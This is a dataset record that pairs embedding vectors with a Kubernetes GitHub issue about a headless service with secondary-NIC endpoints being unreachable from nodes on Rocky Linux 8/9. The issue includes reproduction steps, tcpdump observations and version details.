0.019830500707030296, -0.009721126407384872, -0.017053036019206047, -0.005401870235800743, -0.000012942077773914207, -0.010101907886564732, -0.022473571822047234, 0.004446183331310749, 0.008586248382925987, 0.004714970476925373, -0.009258216246962547, 0.011744494549930096, -0.005424269009381533, 0.003908609505742788, -0.002266023075208068, 0.0007988944416865706, 0.013648401945829391, 0.009429940953850746, -0.016440799459815025, 0.017515946179628372, -0.035927850753068924, 0.0014493961352854967, 0.005569862201809883, 0.005599727388471365, 0.01594802364706993, -0.016142146661877632, -0.0032067771535366774, -0.0022100256755948067, 0.001109679345972836, 0.00702952453866601, -0.01732182316482067, 0.017501015216112137, -0.00028721935814246535, 0.0035670262295752764, -0.0026020065415650606, -0.014297970570623875, 0.01859109476208687, 0.023250067606568336, 0.009810722433030605, -0.012043146416544914, -0.000008428755791101139, -0.0039011433254927397, -0.00009134555148193613, 0.015664303675293922, 0.005629592575132847, -0.0295217614620924, 0.023309798911213875, 0.003298239316791296, 0.0038862107321619987, 0.022070391103625298, 0.014163576997816563, -0.017560744658112526, 0.015410449355840683, 0.029566559940576553, -0.005928244441747665, -0.011445842683315277, -0.026848826557397842, 0.011662364937365055, -0.013491610065102577, -0.001634187065064907, 0.001231939997524023, -0.02722214162349701, 0.0026804027147591114, 0.010004846379160881, 0.01648559793829918, -0.005525064188987017, -0.010893336497247219, 0.020875783637166023, -0.007074322085827589, 0.009161153808236122, -0.0013010032707825303, 0.018322307616472244, 0.0011908753076568246, 0.017366621643304825, -0.011557837016880512, -0.007130319252610207, -0.004412584938108921, 0.005685589741915464, -0.0010536820627748966, -0.0009976847795769572, 0.011259185150265694, -0.010908268392086029, 0.00613356800749898, 0.01438009925186634, 0.015992820262908936, -0.014910207130014896, 0.002378017408773303, -0.011012797243893147, -0.014395032078027725, -0.016888776794075966, 0.04079588130116463, 0.003184378147125244, 0.014701150357723236, 0.001680851448327303, 0.0025889405515044928, 0.030119067057967186, -0.0011423443211242557, -0.011737028136849403, -0.029028985649347305, -0.0027214675210416317, -0.011901287361979485, 0.0034998294431716204, -0.025325700640678406, 0.007451370358467102, -0.008526518009603024, 0.019785702228546143, 0.034494321793317795, 0.0021428288891911507, -0.0025348099879920483, -0.016336271539330482, -0.012498591095209122, -0.011229319497942924, 0.009317946620285511, -0.01636613719165325, -0.013155626133084297, -0.0004904427914880216, 0.0045992424711585045, -0.005263743456453085, -0.0025721413549035788, 0.009877919219434261, -0.004644040483981371, 0.0023238868452608585, -0.016082417219877243, 0.010221368633210659, 0.003889943938702345, 0.001082613947801292, 0.04575350508093834, -0.004580576904118061, 0.008623580448329449, -0.01788926124572754, -0.009116356261074543, -0.030477449297904968, 0.00715645169839263, 0.0016127214767038822, 0.018396969884634018, 0.005525064188987017, -0.0020569665357470512, 0.014066514559090137, -0.00813080370426178, 0.015933090820908546, 0.0017405819380655885, 0.0002879193052649498, -0.02063686214387417, -0.023533787578344345, 0.0334191732108593, 0.0052450778894126415, 0.01431290339678526, 0.0042893909849226475, -0.01180422492325306, -0.008840102702379227, -0.032254427671432495, -0.0011740761110559106, 0.010460290126502514, -0.01959157921373844, -0.0022436240687966347, 0.010579751804471016, 0.014581689611077309, 0.02722214162349701, -0.01600775308907032, -0.014335301704704762, 0.013461744412779808, -0.0072273812256753445, -0.016634922474622726, -0.0012730046873912215, -0.0012263403041288257, 0.01231939997524023, -0.0044573829509317875, 0.013902256265282631, -0.0034998294431716204, 0.004860563203692436, -0.008220399729907513, -0.0031265143770724535, -0.008616114035248756, 0.007936679758131504, 0.012311933562159538, -0.009862986393272877, 0.003904876532033086, -0.02968602068722248, 0.008832636289298534, -0.030507314950227737, -0.009556868113577366, -0.0058573149144649506, 0.016918642446398735, 0.006126101594418287, 0.01926306262612343, -0.02147308737039566, -0.023817507550120354, 0.018650824204087257, -0.0016192544717341661, -0.0035558268427848816, 0.006547947879880667, 0.009429940953850746, 0.00928061455488205, 0.008429456502199173, -0.014559291303157806, 0.01214020885527134, 0.013155626133084297, 0.01776980049908161, -0.006872732192277908, 0.030313190072774887, -0.01099039800465107, 0.0010368828661739826, 0.019068937748670578, 0.00479336641728878, 0.015365651808679104, 0.0059991744346916676, -0.006447152700275183, -0.006413554307073355, 0.0006080370512790978, -0.01111732516437769, -0.006992192938923836, 0.016605058684945107, 0.010310964658856392, -0.008332394063472748, -0.01732182316482067, 0.005801317282021046, 0.015798697248101234, -0.009265681728720665, 0.0008068273891694844, -0.009594199247658253, 0.008840102702379227, -0.0067831361666321754, 0.006592745427042246, -0.010460290126502514, 0.00026085396530106664, 0.021040042862296104, -0.002581474371254444, -0.003679020795971155, -0.015888292342424393, 0.01600775308907032, 0.00894463062286377, -0.002506811171770096, 0.003975806292146444, 0.014686218462884426, 0.010072043165564537, 0.007302044425159693, 0.009325412102043629, -0.02943216636776924, -0.008601181209087372, 0.013543874025344849, 0.00021115638082847, -0.025295834988355637, 0.003763016778975725, 0.012102877721190453, -0.008810237981379032, -0.004095267038792372, 0.011923685669898987, 0.007552165538072586, -0.010975465178489685, 0.001379399443976581, 0.001446596230380237, 0.0020439005456864834, -0.0028782598674297333, -0.011811691336333752, -0.015619506128132343, 0.010415492579340935, -0.023474056273698807, 0.019068937748670578, 0.0019076404860243201, -0.009370210580527782, -0.005121883936226368, 0.0014083314454182982, -0.0012524722842499614, -0.009049159474670887, 0.005166681483387947, -0.00581625010818243, -0.007750022690743208, 0.024310283362865448, -0.0185612291097641, 0.011401045136153698, 0.008489186875522137, -0.024713462218642235, 0.007134052459150553, 0.019561713561415672, 0.0021446954924613237, -0.0075633651576936245, -0.0059655760414898396, 0.011938618496060371, -0.006656209006905556, -0.015134196728467941, -0.004386452957987785, 0.008399590849876404, 0.014686218462884426, -0.025669150054454803, -0.01959157921373844, -0.015253657475113869, 0.016500528901815414, -0.011639966629445553, -0.0009122889023274183, -0.004382719751447439, -0.0008292262791655958, -0.009579266421496868, 0.010213902220129967, 0.0020084355492144823, 0.012864439748227596, 0.015649370849132538, 0.010251234285533428, 0.004009404685348272, -0.0026206723414361477, -0.015828562900424004, 0.004308057017624378, -0.010826139710843563, 0.009810722433030605, -0.003264640923589468, 0.030850764364004135, 0.00023577184765599668, 0.0206069964915514, 0.001059281756170094, -0.0191436018794775, -0.009220884181559086, -0.006185831967741251, 0.00216896110214293, -0.004980023950338364, -0.002562808571383357, 0.01201328169554472, 0.006842866539955139, 0.03323998302221298, 0.009527002461254597, -0.003845146158710122, -0.0069847265258431435, -0.0071863168850541115, 0.013730531558394432, 0.002986521227285266, -0.0027606654912233353, -0.007231114432215691, 0.015798697248101234, -0.026878690347075462, 0.003721951972693205, 0.005368271842598915, 0.02195093035697937, -0.005726654548197985, -0.014335301704704762, -0.007365508005023003, -0.005304808262735605, 0.015380584634840488, -0.019083870574831963, -0.008347326889634132, 0.011498106643557549, 0.012453793548047543, -0.0014148644404485822, -0.008324927650392056, 0.003744350979104638, -0.01872548833489418, -0.009900317527353764, -0.016127213835716248, -0.027117611840367317, 0.002019634936004877, 0.025997666642069817, -0.016082417219877243, 0.0011946085141971707, -0.011789292097091675, 0.000236705134739168, 0.013118294067680836, -0.014148644171655178, 0.0060663712210953236, -0.0029286574572324753, 0.02124909870326519, 0.009721126407384872, 0.0165154617279768, -0.005401870235800743, 0.03550973907113075, -0.0027401333209127188, 0.03786908835172653, -0.00673460541293025, -0.01260311994701624, 0.005737853702157736, 0.01261805184185505, -0.0008735574665479362, -0.015500045381486416, -0.0007088321726769209, 0.013237755745649338, -0.02057713083922863, -0.010982931591570377, -0.009564334526658058, 0.008108405396342278, 0.02719227597117424, 0.009892851114273071, 0.00813080370426178, -0.015037134289741516, -0.004308057017624378, 0.013879857026040554, 0.007477502338588238, 0.003889943938702345, 0.001471795025281608, -0.01600775308907032, -0.003527828259393573, -0.000594971003010869, -0.00587971368804574, -0.002693468937650323, -0.0008959563565440476, 0.0003212843439541757, 0.0050098891369998455, -0.008287596516311169, 0.017396485432982445, -0.021428288891911507, 0.014439830556511879, 0.016022685915231705, 0.00719004962593317, -0.005581061355769634, -0.006790602579712868, 0.009818188846111298, -0.027819445356726646, 0.004696304444223642, -0.003776082769036293, 0.022757291793823242, -0.019158532842993736, -0.019322792068123817, 0.0035240950528532267, -0.004875496029853821, 0.00017487481818534434, -0.005416803061962128, 0.012894305400550365, 0.012394063174724579, -0.0010303498711436987, -0.005517597775906324, 0.020890716463327408, 0.015918157994747162, 0.00223242468200624, 0.013476677238941193, -0.003300105920061469, 0.024370012804865837, 0.00047154369531199336, 0.016321338713169098, -0.004875496029853821, -0.027147477492690086, -0.009086490608751774, 0.013767862692475319, 0.011699697002768517, -0.0020606997422873974, 0.021712008863687515, -0.014141177758574486, -0.014768347144126892, 0.030507314950227737, 0.0066748750396072865, 0.00034298328682780266, 0.006428487133234739, 0.03210510313510895, -0.004386452957987785, -0.011221853084862232, -0.02009928785264492, -0.011221853084862232, 0.021652279421687126, 0.00023367194808088243, 0.008616114035248756, -0.016560260206460953, 0.015873359516263008, 0.01939745619893074, 0.02083098515868187, -0.023533787578344345, 0.01993502862751484, -0.0065890122205019, 0.004162463825196028, 0.022563166916370392, -0.008780372329056263, 0.011975950561463833, -0.01661999151110649, 0.002992121037095785, 0.0032515749335289, 0.018934544175863266, 0.010811206884682178, 0.020845917984843254, -0.006753270979970694, 0.01119945477694273, 0.004584310110658407, 0.00665247580036521, 0.006081304047256708, 0.013536407612264156, 0.015768831595778465, 0.0016920509515330195, 0.009131289087235928, -0.0034550316631793976, -0.012431394308805466, 0.039959654211997986, -0.015918157994747162, -0.006387422326952219, -0.026281386613845825, 0.0010098174680024385, 0.013551340438425541, -0.027072815224528313, 0.025609418749809265, 0.009265681728720665, -0.002120430115610361, -0.00856384914368391, 0.014521959237754345, 0.0022548234555870295, 0.013192957267165184, 0.00833986047655344, 0.0020644327159971, 0.015455246903002262, 0.011639966629445553, -0.0029659888241440058, 0.01265538390725851, 0.00260760635137558, -0.007473769132047892, -0.014917673543095589, 0.01397691946476698, 0.007014591712504625, 0.0008973563089966774, -0.022891685366630554, 0.014790746383368969, -0.007425238378345966, 0.012199939228594303, -0.0035875586327165365, -0.01962144486606121, -0.0013150026788935065, -0.00915368739515543, -0.0085489172488451, -0.019024139270186424, -0.012730047106742859, 0.003449432086199522, 0.0030593175906687975, -0.0004890428390353918, -0.01850149966776371, 0.01380519475787878, 0.018202846869826317, 0.025519823655486107, -0.004125132225453854, 0.003712619189172983, 0.013506541959941387, -0.009422474540770054, 0.004703770857304335, -0.0032889065332710743, 0.02192106656730175, 0.004864296410232782, -0.0065740798600018024, 0.02192106656730175, -0.0050434875302016735, 0.011662364937365055, 0.006316492334008217, -0.0019169732695445418, 0.013902256265282631, 0.008377191610634327, 0.0082577308639884, 0.0010182170663028955, 0.00761189591139555, 0.012774844653904438, 0.017530879005789757, -0.005958109628409147, 0.021682143211364746, -0.021323760971426964, 0.01073654368519783, -0.00042627923539839685, -0.0008964230073615909, -0.00673460541293025, -0.0053794714622199535, -0.004938959609717131, -0.005678123328834772, -0.009064092300832272, -0.034106072038412094, -0.0015063266037032008, -0.015216325409710407, 0.03350876644253731, 0.005961842834949493, -0.010796274058520794, 0.0174412839114666, 0.013431878760457039, -0.0009449539938941598, -0.009474738501012325, -0.018516432493925095, -0.0011386112309992313, -0.013416946865618229, 0.018292441964149475, -0.007824685424566269, 0.015858428552746773, -0.026893623173236847, -0.01236419752240181, 0.02856607548892498, -0.02018888294696808, -0.03138833865523338, 0.0034755640663206577, 0.0025889405515044928, 0.00248067919164896, -0.000060255399148445576, 0.007585763931274414, 0.023399394005537033, 0.009325412102043629, -0.007399106398224831, -0.002590807154774666, 0.0015427249018102884, -0.014088913798332214, 0.01305109728127718, 0.007981478236615658, 0.008526518009603024, 0.001510059810243547, 0.023817507550120354, -0.00630155997350812, 0.00643968628719449, -0.02696828730404377, -0.009527002461254597, -0.03344903886318207, -0.017874330282211304, 0.011654899455606937, 0.01971103996038437, 0.012632984668016434, 0.0023500188253819942, 0.017948992550373077, 0.01474594883620739, 0.014992336742579937, -0.008571315556764603, 0.0067420718260109425, -0.002525476971641183, -0.00041087999125011265, 0.005271209869533777, 0.0009762191330082715, -0.0043901861645281315, -0.01063948217779398, 0.05474293231964111, -0.015619506128132343, -0.004087801091372967, 0.002475079381838441, -0.006585279479622841, 0.00652554864063859, -0.013984385877847672, -0.010086975060403347, -0.00019214063649997115, 0.004173663444817066, -0.017934059724211693, -0.0053458730690181255, 0.009653929620981216, -0.0007237647660076618, 0.0046253749169409275, -0.014828077517449856, -0.008048675023019314, 0.0013346016639843583, -0.01620187796652317, -0.007641761098057032, -0.008138270117342472, -0.007425238378345966, 0.013999317772686481, 0.018904678523540497, -0.011274117976427078, -0.002196959685534239, 0.008653445169329643, -0.011065061204135418, 0.009392608888447285, -0.02725200541317463, 0.010251234285533428, 0.01099039800465107, 0.026953354477882385, -0.01552991010248661, -0.009960047900676727, 0.02201066166162491, 0.0036846206057816744, 0.009870452806353569, -0.015858428552746773, -0.01833724044263363, -0.012147675268352032, 0.00957180093973875, -0.031836315989494324, 0.005771452095359564, -0.024683598428964615, 0.0005319740739651024, 0.008272663690149784, 0.010057110339403152, -0.017784733325242996, 0.021831469610333443, -0.019113736227154732, 0.0065740798600018024, -0.011468241922557354, 0.023668181151151657, 0.00690259737893939, -0.006305292714387178, 0.014014250598847866, -0.0020588331390172243, -0.008444388397037983, -0.010281099006533623, 0.0005613726680167019, -0.0016276540700346231, -0.005696789361536503, -0.002398549811914563, 0.007134052459150553, 0.0007830285467207432, 0.015918157994747162, -0.00521521270275116, -0.0028969256673008204, 0.006790602579712868, 0.003931008744984865, -0.01094560045748949, -0.009340344928205013, -0.008556383661925793, -0.021383492276072502, -0.017277024686336517, 0.023563653230667114, 0.008481720462441444, 0.005793851334601641, -0.00786201748996973, -0.005260010715574026, -0.004924026783555746, 0.016575193032622337, 0.0043229893781244755, -0.014432364143431187, -0.013566272333264351, 0.011498106643557549, 0.012752445414662361, -0.014215840958058834, 0.009183553047478199, 0.03210510313510895, 0.006402354687452316, -0.013491610065102577, 0.0013262020656839013, -0.0007396306609734893, 0.007324443198740482, 0.01359613798558712, 0.01007950957864523, 0.007981478236615658, 0.01369319949299097, 0.007697758264839649, 0.007742556277662516, -0.00406540185213089, 0.0004689771740231663, 0.015104331076145172, 0.01369319949299097, -0.02750585973262787, 0.0006155033479444683, -0.028252489864826202, 0.006719672586768866, 0.023339662700891495, -0.001478328020311892, -0.01575389876961708, 0.020980311557650566, 0.028461547568440437, -0.0032571747433394194, 0.021114705130457878, -0.0023892170283943415, 0.013170558959245682, 0.02310074120759964, -0.007981478236615658, 0.02495238557457924, 0.01145330909639597, -0.0009272214956581593, -0.004629108123481274, -0.009624064899981022, -0.007974011823534966, 0.0075372327119112015, 0.012998833321034908, -0.00022597232600674033, -0.01833724044263363, -0.012662850320339203, -0.001967370742931962, 0.009653929620981216, -0.000946820538956672, 0.015126730315387249, 0.0013411346590146422, 0.029028985649347305, -0.0012179407058283687, 0.01715756393969059, 0.019382523372769356, 0.012670316733419895, 0.025699015706777573, -0.0008147603366523981, -0.007735089864581823, 0.005185347516089678, 0.0035427608527243137, 0.005271209869533777, -0.013558805920183659, -0.0013831326505169272, 0.016575193032622337, -0.004005671478807926, 0.025743812322616577, -0.008078539744019508, -0.0005623059696517885, 0.012520990334451199, -0.009228350594639778, 0.028028501197695732, -0.019382523372769356, 0.007720157504081726, -0.00521521270275116, 0.0022548234555870295, 0.004681372083723545, -0.00665247580036521, 0.016545327380299568, 0.01038562785834074, 0.018202846869826317, 0.0066748750396072865, 0.030343055725097656, 0.004737369250506163, -0.007302044425159693, -0.0004496114270295948, 0.0035427608527243137, -0.00786201748996973, 0.009885385632514954, 0.03016386367380619, 0.00836972612887621, 0.0048344312235713005, 0.018486566841602325, 0.0007326310151256621, 0.025699015706777573, -0.004442450124770403, -0.025280902162194252, -0.006126101594418287, 0.015253657475113869, -0.025728879496455193, -0.007690292317420244, -0.015888292342424393, 0.00803374219685793, -0.006977260112762451, 0.02463879995048046, -0.004953891970217228, 0.01575389876961708, -0.02281702123582363, 0.00021488952916115522, 0.006323958747088909, 0.0024022830184549093, 0.031836315989494324, 0.007350575178861618, 0.0022734892554581165, 0.01773993670940399, 0.01261805184185505, -0.007096720859408379, 0.010221368633210659 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? I have a 4-node (1 control-plane and 3 workers) cluster setup. Each node have two NICs, one for Pod network (inside 192.168.16.0/20), the other one for storage (inside 10.87.87.0/24). I have a headless service, an operator would dynamically update its endpoints with storage NIC IPs. I cannot access this headless service (like `nc -vz <SERVICE-IP> <PORT>`) on nodes properly. But I can access other services on nodes. ### What did you expect to happen? I should be able to access this headless service with secondary IPs just like other services from any node. ### How can we reproduce it (as minimally and precisely as possible)? 1. Setup a cluster with at least 2 Rocky8/9 nodes, each node needs to have two NICs 2. Assign different subnet and IP for two NICs 3. Create a nginx deployment but run each Pod with host network 4. Create a headless service and set its endpoints to IPs of secondary NIC of each nodes 5. Try `nc -vz <SERVICE-IP> 80` from any node. It will or will not succeed, depending on whether the service resolves to current node or node ### Anything else we need to know? I've tried several combinations to rule out possible causes: 1. The problem exists on at least Rocky 8 and 9, with Kubernetes 1.25.12 and 1.30.0, with Calico, Flannel and Cilium CNI 2. The problem doesn't exist on Ubuntu 24.04, with Kubernetes 1.25.12, with Calico CNI So it seems to me that it's not a CNI issue, but rather related to kube-proxy (or its combination with OS). I also dug a little bit with tcpdump. It seems to me the source node did transmitted packets, but the source IP is the primary NIC's, not the secondary one's. This can be the real cause, but don't know what caused this. And I can confirm that: 1. Connections between nodes via secondary NIC is OK, I can access the port via secondary NIC's IP normally 2. Firewall is stopped and disabled, selinux is turned off ### Kubernetes version <details> ```console $ kubectl version WARNING: This version information is deprecated and will be replaced with the output from kubectl version --short. Use --output=yaml|json to get the full version. Client Version: version.Info{Major:"1", Minor:"25", GitVersion:"v1.25.16", GitCommit:"c5f43560a4f98f2af3743a59299fb79f07924373", GitTreeState:"clean", BuildDate:"2023-11-15T22:39:12Z", GoVersion:"go1.20.10", Compiler:"gc", Platform:"linux/amd64"} Kustomize Version: v4.5.7 Server Version: version.Info{Major:"1", Minor:"30", GitVersion:"v1.30.0", GitCommit:"7c48c2bd72b9bf5c44d21d7338cc7bea77d0ad2a", GitTreeState:"clean", BuildDate:"2024-04-17T17:27:03Z", GoVersion:"go1.22.2", Compiler:"gc", Platform:"linux/amd64"} WARNING: version difference between client (1.25) and server (1.30) exceeds the supported minor version skew of +/-1 ``` </details> ### Cloud provider <details> </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release NAME="Rocky Linux" VERSION="9.3 (Blue Onyx)" ID="rocky" ID_LIKE="rhel centos fedora" VERSION_ID="9.3" PLATFORM_ID="platform:el9" PRETTY_NAME="Rocky Linux 9.3 (Blue Onyx)" ANSI_COLOR="0;32" LOGO="fedora-logo-icon" CPE_NAME="cpe:/o:rocky:rocky:9::baseos" HOME_URL="https://rockylinux.org/" BUG_REPORT_URL="https://bugs.rockylinux.org/" SUPPORT_END="2032-05-31" ROCKY_SUPPORT_PRODUCT="Rocky-Linux-9" ROCKY_SUPPORT_PRODUCT_VERSION="9.3" REDHAT_SUPPORT_PRODUCT="Rocky Linux" REDHAT_SUPPORT_PRODUCT_VERSION="9.3" $ uname -a Linux kube-1 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Nov 8 17:36:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details>
Selector-less service with secondary IPs not working properly on Rocky 8/9 with latest kube-proxy
https://api.github.com/repos/kubernetes/kubernetes/issues/124587/comments
30
2024-04-28T06:24:23
2024-05-09T02:06:56Z
https://github.com/kubernetes/kubernetes/issues/124587
2,267,374,962
124,587
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Selector-less service with secondary IPs not working properly on Rocky 8/9 with latest kube-proxy Issue date: --- start body --- ### What happened? I have a 4-node (1 control-plane and 3 workers) cluster setup. Each node have two NICs, one for Pod network (inside 192.168.16.0/20), the other one for storage (inside 10.87.87.0/24). I have a headless service, an operator would dynamically update its endpoints with storage NIC IPs. I cannot access this headless service (like `nc -vz <SERVICE-IP> <PORT>`) on nodes properly. But I can access other services on nodes. ### What did you expect to happen? I should be able to access this headless service with secondary IPs just like other services from any node. ### How can we reproduce it (as minimally and precisely as possible)? 1. Setup a cluster with at least 2 Rocky8/9 nodes, each node needs to have two NICs 2. Assign different subnet and IP for two NICs 3. Create a nginx deployment but run each Pod with host network 4. Create a headless service and set its endpoints to IPs of secondary NIC of each nodes 5. Try `nc -vz <SERVICE-IP> 80` from any node. It will or will not succeed, depending on whether the service resolves to current node or node ### Anything else we need to know? I've tried several combinations to rule out possible causes: 1. The problem exists on at least Rocky 8 and 9, with Kubernetes 1.25.12 and 1.30.0, with Calico, Flannel and Cilium CNI 2. The problem doesn't exist on Ubuntu 24.04, with Kubernetes 1.25.12, with Calico CNI So it seems to me that it's not a CNI issue, but rather related to kube-proxy (or its combination with OS). I also dug a little bit with tcpdump. It seems to me the source node did transmitted packets, but the source IP is the primary NIC's, not the secondary one's. This can be the real cause, but don't know what caused this. And I can confirm that: 1. Connections between nodes via secondary NIC is OK, I can access the port via secondary NIC's IP normally 2. Firewall is stopped and disabled, selinux is turned off ### Kubernetes version <details> ```console $ kubectl version WARNING: This version information is deprecated and will be replaced with the output from kubectl version --short. Use --output=yaml|json to get the full version. Client Version: version.Info{Major:"1", Minor:"25", GitVersion:"v1.25.16", GitCommit:"c5f43560a4f98f2af3743a59299fb79f07924373", GitTreeState:"clean", BuildDate:"2023-11-15T22:39:12Z", GoVersion:"go1.20.10", Compiler:"gc", Platform:"linux/amd64"} Kustomize Version: v4.5.7 Server Version: version.Info{Major:"1", Minor:"30", GitVersion:"v1.30.0", GitCommit:"7c48c2bd72b9bf5c44d21d7338cc7bea77d0ad2a", GitTreeState:"clean", BuildDate:"2024-04-17T17:27:03Z", GoVersion:"go1.22.2", Compiler:"gc", Platform:"linux/amd64"} WARNING: version difference between client (1.25) and server (1.30) exceeds the supported minor version skew of +/-1 ``` </details> ### Cloud provider <details> </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release NAME="Rocky Linux" VERSION="9.3 (Blue Onyx)" ID="rocky" ID_LIKE="rhel centos fedora" VERSION_ID="9.3" PLATFORM_ID="platform:el9" PRETTY_NAME="Rocky Linux 9.3 (Blue Onyx)" ANSI_COLOR="0;32" LOGO="fedora-logo-icon" CPE_NAME="cpe:/o:rocky:rocky:9::baseos" HOME_URL="https://rockylinux.org/" BUG_REPORT_URL="https://bugs.rockylinux.org/" SUPPORT_END="2032-05-31" ROCKY_SUPPORT_PRODUCT="Rocky-Linux-9" ROCKY_SUPPORT_PRODUCT_VERSION="9.3" REDHAT_SUPPORT_PRODUCT="Rocky Linux" REDHAT_SUPPORT_PRODUCT_VERSION="9.3" $ uname -a Linux kube-1 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Nov 8 17:36:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details> --- end body ---
4,165
[ -0.007004035636782646, -0.02620682492852211, -0.01259454246610403, -0.023959314450621605, -0.004692915827035904, -0.014559347182512283, -0.009520117193460464, 0.027987871319055557, -0.004873140715062618, -0.004201714415103197, -0.03728889301419258, 0.02207932062447071, -0.023266684263944626, -0.025599008426070213, -0.006837945897132158, 0.05054779350757599, -0.007562379352748394, 0.01904023438692093, -0.002429502783343196, -0.01776805706322193, -0.004915546625852585, 0.00042648817179724574, -0.0001959062647074461, 0.020877821370959282, 0.034631457179784775, 0.019181586802005768, 0.0026945394929498434, 0.019252263009548187, -0.0501520037651062, 0.009145531803369522, 0.010679210536181927, 0.019492562860250473, 0.040850985795259476, 0.03044741228222847, 0.03915474936366081, 0.0029790119733661413, 0.006353812292218208, 0.020962633192539215, 0.015054082497954369, -0.012099807150661945, -0.03856106847524643, -0.03177613019943237, 0.015577088110148907, -0.008940570056438446, 0.0016008213860914111, 0.0057495287619531155, 0.031267259269952774, 0.01795181632041931, -0.034009505063295364, -0.03395296260714531, -0.015760846436023712, -0.023478714749217033, -0.036384232342243195, -0.021513909101486206, 0.03058876469731331, -0.014361453242599964, 0.03542303293943405, 0.0346597284078598, -0.01054492499679327, -0.013930327259004116, -0.03381161019206047, -0.00592975364997983, 0.030871469527482986, 0.023266684263944626, 0.031380340456962585, 0.0385327972471714, -0.018008356913924217, -0.023549390956759453, -0.056484613567590714, -0.0041946470737457275, -0.04755111038684845, -0.028157494962215424, 0.018149711191654205, 0.026517800986766815, 0.0530073307454586, -0.014743106439709663, 0.025740360841155052, 0.010057257488369942, -0.015845658257603645, -0.004113369155675173, -0.02934485860168934, 0.011407177895307541, -0.03058876469731331, 0.016538288444280624, 0.028525011613965034, 0.02028413861989975, -0.026560207828879356, -0.06343917548656464, -0.0008635777630843222, 0.002466607838869095, -0.015774982050061226, -0.007852152921259403, 0.017428811639547348, -0.04215143248438835, 0.02025586925446987, -0.00035271962406113744, -0.010870036669075489, 0.0020796542521566153, -0.06988486647605896, 0.015025812201201916, -0.02378969080746174, -0.009555455297231674, -0.02957102470099926, 0.035875361412763596, 0.05153726413846016, 0.017881140112876892, -0.003653972176834941, -0.005982760805636644, -0.003982617519795895, 0.09640266746282578, 0.0022846159990876913, -0.027577947825193405, -0.01940775103867054, -0.0044738189317286015, -0.02733764797449112, 0.015039946883916855, 0.004392541013658047, -0.0015239608474075794, -0.01984594576060772, 0.016467610374093056, 0.008163128979504108, -0.02065165713429451, 0.019944891333580017, -0.02851087786257267, -0.01670791208744049, 0.0016538287745788693, -0.017570164054632187, 0.03658212721347809, -0.02931658923625946, -0.04738148674368858, 0.010021919384598732, 0.011060863733291626, -0.025386977940797806, -0.01717437617480755, 0.0318043977022171, -0.013605215586721897, -0.008106588385999203, -0.0018464220920577645, -0.051593802869319916, -0.01005019061267376, -0.006742532830685377, -0.03943745419383049, 0.014630023390054703, 0.02518908493220806, 0.004901411477476358, -0.00770373223349452, 0.019125046208500862, 0.018743392080068588, -0.010142069309949875, -0.016184905543923378, -0.008615458384156227, -0.020665792748332024, 0.008290346711874008, 0.009838161058723927, 0.03157823532819748, -0.045854877680540085, 0.01553468219935894, -0.018036628141999245, 0.015251976437866688, 0.010679210536181927, 0.008240872994065285, -0.02321014367043972, -0.006032234523445368, -0.010325828567147255, 0.010248084552586079, 0.039380915462970734, -0.001141424523666501, 0.030277788639068604, 0.002894200384616852, 0.022248944267630577, 0.005548100918531418, 0.003975549712777138, 0.018404146656394005, 0.0017192044761031866, -0.019648050889372826, -0.01998729817569256, -0.0011749959085136652, 0.02159872092306614, 0.022362027317285538, 0.0036168668884783983, 0.013477997854351997, 0.0009196772007271647, -0.05874625965952873, -0.012905518524348736, 0.020566845312714577, -0.028369523584842682, -0.002775817411020398, -0.005049831699579954, 0.017527757212519646, -0.000848117342684418, -0.0013843748020008206, -0.017965951934456825, 0.01689166948199272, -0.0299668125808239, -0.037628136575222015, 0.00988763477653265, 0.01553468219935894, -0.007049974985420704, 0.014969270676374435, -0.00024758841027505696, 0.00783801730722189, -0.01528024673461914, -0.038363173604011536, -0.011619207449257374, 0.007717867381870747, 0.020057974383234978, -0.026263365522027016, 0.03745851665735245, 0.007774408906698227, -0.054703567177057266, -0.016326257959008217, -0.055042814463377, 0.02784651890397072, -0.010714548639953136, 0.024977054446935654, 0.013068074360489845, -0.009915905073285103, 0.025980660691857338, -0.021330149844288826, -0.008375158533453941, 0.020057974383234978, -0.000511962512973696, -0.016312122344970703, 0.03697791323065758, -0.04155774787068367, -0.0048943436704576015, 0.03019297681748867, -0.04096406698226929, 0.007099448703229427, -0.027535542845726013, 0.019322939217090607, -0.03629942238330841, 0.006092309486120939, 0.01101845782250166, -0.012799504213035107, -0.004965020343661308, -0.016071822494268417, -0.0051735155284404755, 0.00805711466819048, 0.025980660691857338, 0.00893350224941969, 0.01626971736550331, -0.03581882268190384, -0.004774193745106459, -0.028920801356434822, -0.0078733554109931, -0.005085170269012451, 0.0444413460791111, -0.000460722076240927, 0.023563526570796967, -0.012587474659085274, 0.024835702031850815, -0.004767125938087702, -0.019506698474287987, 0.007541176397353411, -0.01798008754849434, -0.01827692799270153, -0.017852868884801865, 0.02982545830309391, -0.021570449694991112, 0.03183266893029213, 0.013209426775574684, 0.0008710871334187686, 0.032765600830316544, 0.028567418456077576, -0.01262988056987524, 0.008657864294946194, 0.04755111038684845, -0.0009611996356397867, 0.030362600460648537, -0.006452759262174368, -0.019252263009548187, -0.018474822863936424, -0.006837945897132158, 0.011937251314520836, -0.001444449764676392, 0.028355389833450317, -0.012050333432853222, 0.010594398714601994, -0.0045869010500609875, -0.0007659559487365186, -0.004067429341375828, -0.016820993274450302, 0.0013481531059369445, -0.04766419157385826, 0.0294579416513443, 0.008403428830206394, -0.033500634133815765, -0.006155918352305889, 0.002779351081699133, -0.02634817734360695, -0.0009779853280633688, 0.011110336519777775, 0.013011532835662365, 0.030023353174328804, 0.002692772541195154, 0.010898307897150517, 0.050208546221256256, 0.005731859710067511, -0.006781404837965965, 0.01560535840690136, 